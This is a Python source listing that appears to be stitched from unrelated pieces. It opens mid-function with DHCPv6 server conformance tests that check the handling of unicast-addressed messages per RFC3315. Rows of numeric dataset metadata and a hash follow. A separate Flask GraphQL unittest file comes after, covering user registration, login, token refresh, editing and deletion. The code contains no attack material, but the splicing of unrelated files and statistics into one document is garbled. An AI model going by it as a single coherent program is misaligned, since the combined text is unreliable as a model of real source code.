srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres('GLOBAL', None)
# message won't contain the client-id option
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
# message won't contain the client-id option
srv_msg.client_requests_option('7')
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', 'NOT ', '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '7')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_global_request():
# Server MUST discard any Request message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# In this test, a failure with 'NoAddrAvail' at the end means that the
# server sent back a REPLY with the UseMulticast status code but also
# assigned an address.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# GLOBAL_UNICAST dest REQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code option with UseMulticast
#
# SOLICIT -->
# <-- ADVERTISE
# correct message REQUEST -->
# <-- REPLY
# REPLY MUST include option:
# client-id
# server-id
# IA_NA
# IA_Address with address 3000::1.
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_save_option('server-id')
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'address', '3000::1')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_global_renew():
# Server MUST discard any RENEW message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL UNICAST dest RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code with UseMulticast
# correct message RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
# IA-Address
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_global_release():
# Server MUST discard any RELEASE message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
#
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL UNICAST dest RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with UseMulticast
# correct message RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with Success
misc.test_setup()
# Server is configured with 3000::/64 subnet with 3000::1-3000::ff pool.
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_solicit():
# Server MUST discard any Solicit it receives with
# a unicast address destination
# Message details Client Server
# LINK_LOCAL_UNICAST dest SOLICIT -->
# X ADVERTISE
# correct message SOLICIT -->
# <-- ADVERTISE
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_confirm():
# Server MUST discard any Confirm it receives with
# a unicast address destination
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL_UNICAST dest CONFIRM -->
# X REPLY
# correct message CONFIRM -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_rebind():
# Server MUST discard any Rebind it receives with
# a unicast address destination.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL
# UNICAST dest REBIND -->
# X REPLY
# correct message REBIND -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_local_inforequest():
# Server MUST discard any Information-Request it receives with
# a unicast address destination.
# Message details Client Server
# LINK_LOCAL
# UNICAST dest INFOREQUEST -->
# X REPLY
# correct message INFOREQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.config_srv_opt('preference', '123')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
# message won't contain the client-id option
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_requests_option('7')
# message won't contain the client-id option
srv_msg.client_send_msg('INFOREQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', 'NOT ', '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '7')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_local_request():
# Server MUST discard any Request message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# In this test, a failure with 'NoAddrAvail' at the end means that the
# server sent back a REPLY with the UseMulticast status code but also
# assigned an address.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# LINK_LOCAL
# UNICAST dest REQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code option with UseMulticast
#
# SOLICIT -->
# <-- ADVERTISE
# correct message REQUEST -->
# <-- REPLY
# REPLY MUST include option:
# client-id
# server-id
# IA_NA
# IA_Address with address 3000::1.
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::1')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_save_option('server-id')
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
srv_msg.response_check_suboption_content('Response', '5', '3', None, 'address', '3000::1')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_local_renew():
# Server MUST discard any RENEW message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL
# UNICAST dest RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status code with UseMulticast
# correct message RENEW -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
# IA-Address
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RENEW')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
@pytest.mark.status_code
@pytest.mark.disabled
def test_v6_basic_message_unicast_local_release():
# Server MUST discard any RELEASE message it receives with
# a unicast address destination, and send back REPLY with
# UseMulticast status code.
#
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# LINK_LOCAL
# UNICAST dest RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with UseMulticast
# correct message RELEASE -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# status-code with Success
misc.test_setup()
srv_control.config_srv_subnet('3000::/64', '3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres(None, 'LINK_LOCAL')
srv_msg.client_save_option('IA_NA')
srv_msg.client_save_option('server-id')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '13')
srv_msg.response_check_option_content('Response', '13', None, 'statuscode', '5')
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('RELEASE')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
| 34.986653
| 94
| 0.660622
| 4,377
| 34,077
| 4.807631
| 0.030158
| 0.085824
| 0.099225
| 0.059592
| 0.991921
| 0.991921
| 0.991921
| 0.991921
| 0.991921
| 0.989118
| 0
| 0.018533
| 0.216216
| 34,077
| 973
| 95
| 35.02261
| 0.769329
| 0.205945
| 0
| 0.965035
| 0
| 0
| 0.143401
| 0.006008
| 0
| 0
| 0
| 0
| 0
| 1
| 0.024476
| true
| 0.08042
| 0.008741
| 0
| 0.033217
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
4f1ffa81a9cbebe3dee8e8462fdb8186d8ea9338
| 12,558
|
py
|
Python
|
app/tests/test_mutations.py
|
yeeeeees/eventio-backend
|
85f245220c36e1e8a243097cbb9ca68533b69c7e
|
[
"Apache-2.0"
] | 2
|
2020-02-04T07:48:48.000Z
|
2020-03-03T11:15:54.000Z
|
app/tests/test_mutations.py
|
yeeeeees/eventio-backend
|
85f245220c36e1e8a243097cbb9ca68533b69c7e
|
[
"Apache-2.0"
] | 4
|
2020-02-01T15:42:13.000Z
|
2020-02-03T21:03:02.000Z
|
app/tests/test_mutations.py
|
yeeeeees/eventio-backend
|
85f245220c36e1e8a243097cbb9ca68533b69c7e
|
[
"Apache-2.0"
] | null | null | null |
import json
import unittest
from app.schema import schema
from app import create_app, db
from graphene.test import Client
from app.config import TestingConfig
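# Each TestCase below builds a fresh Flask app with TestingConfig, creates an
# empty database, posts GraphQL mutations to /graphql, and asserts on the JSON
# payload returned by the schema.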
class TestCreateUser(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
self.query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
}
}'''
def tearDown(self):
with self.app.app_context():
db.drop_all()
def test_okay_register(self):
response = self.client.post("/graphql", data={"query": self.query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("createUser").get("success") == True
def test_taken_username_register(self):
query2 = '''mutation{
createUser(email:"test2@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": self.query})
response = self.client.post("/graphql", data={"query": query2})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("createUser").get("message") == "That username is already taken. Plesae try again with different username."
def test_taken_email_register(self):
query2 = '''mutation{
createUser(email:"test@user.com", username:"test_user2", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": self.query})
response = self.client.post("/graphql", data={"query": query2})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("createUser").get("message") == "That email is already in use. Plesae try again with different email."
class TestLoginUser(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def test_successful_login(self):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("success") == True
def test_no_info_login(self):
query = '''mutation{
loginUser(password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Please enter your email/username to login."
def test_invalid_username(self):
query = '''mutation{
loginUser(username:"wrong_name", password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Invalid username/email or password."
def test_invalid_email(self):
query = '''mutation{
loginUser(email:"wrong_email", password:"test"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Invalid username/email or password."
def test_invalid_password(self):
query = '''mutation{
loginUser(username:"test_user", password:"wrong_pw"){
success
message
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("loginUser").get("message") == "Invalid username/email or password."
class TestCreatAccessToken(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def get_refresh_token(self, username, password):
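# Note: the username/password arguments are ignored; the query below hardcodes
# the "test_user"/"test" credentials created in setUp.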
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
refreshToken
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
return data.get("data").get("loginUser").get("refreshToken")
def test_successful_refresh_token(self):
query = '''mutation{
getAccessToken {
accessToken
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_refresh_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("getAccessToken").get("message") == "Access token created successfully."
class TestEditUser(unittest.TestCase):
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def get_access_token(self, username, password):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
accessToken
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
return data.get("data").get("loginUser").get("accessToken")
def test_successful_edit(self):
query = '''mutation{
editUser(username:"test_user_changed"){
success
message
user{
username
}
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("success") == True
assert data.get("data").get("editUser").get("user").get("username") == "test_user_changed"
def test_no_data_supplied(self):
query = '''mutation{
editUser{
success
message
user{
username
}
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("message") == "Please supply some data to edit user with."
def test_username_taken(self):
query = '''mutation{
editUser(username:"test_user"){
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("message") == "That username is already taken. Please try again with different username."
def test_email_taken(self):
query = '''mutation{
editUser(email:"test@user.com"){
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("editUser").get("message") == "That email is already in use. Please try again with different email."
class TestDeleteUser(unittest.TestCase):  # inherit TestCase so unittest discovers and runs these tests
def setUp(self):
self.app = create_app()
self.app.config.from_object(TestingConfig)
self.client = self.app.test_client()
with self.app.app_context():
db.create_all()
query = '''mutation{
createUser(email:"test@user.com", username:"test_user", password:"test", fname:"test", surname:"dummy"){
success
message
}
}'''
self.client.post("/graphql", data={"query": query})
def tearDown(self):
with self.app.app_context():
db.drop_all()
def get_access_token(self, username, password):
query = '''mutation{
loginUser(username:"test_user", password:"test"){
success
message
accessToken
}
}'''
response = self.client.post("/graphql", data={"query": query})
data = json.loads(response.get_data(as_text=True))
return data.get("data").get("loginUser").get("accessToken")
def test_successful_user_delete(self):
query = '''mutation{
deleteUser{
success
message
}
}'''
headers = {"Authorization": "Bearer " + self.get_access_token("test_user", "test")}
response = self.client.post("/graphql", data={"query": query}, headers=headers)
data = json.loads(response.get_data(as_text=True))
assert data.get("data").get("deleteUser").get("success") == True
| 36.4
| 143
| 0.519032
| 1,222
| 12,558
| 5.212766
| 0.082651
| 0.03956
| 0.050549
| 0.075824
| 0.873626
| 0.847724
| 0.828728
| 0.789011
| 0.756515
| 0.756515
| 0
| 0.000732
| 0.34703
| 12,558
| 344
| 144
| 36.505814
| 0.776098
| 0
| 0
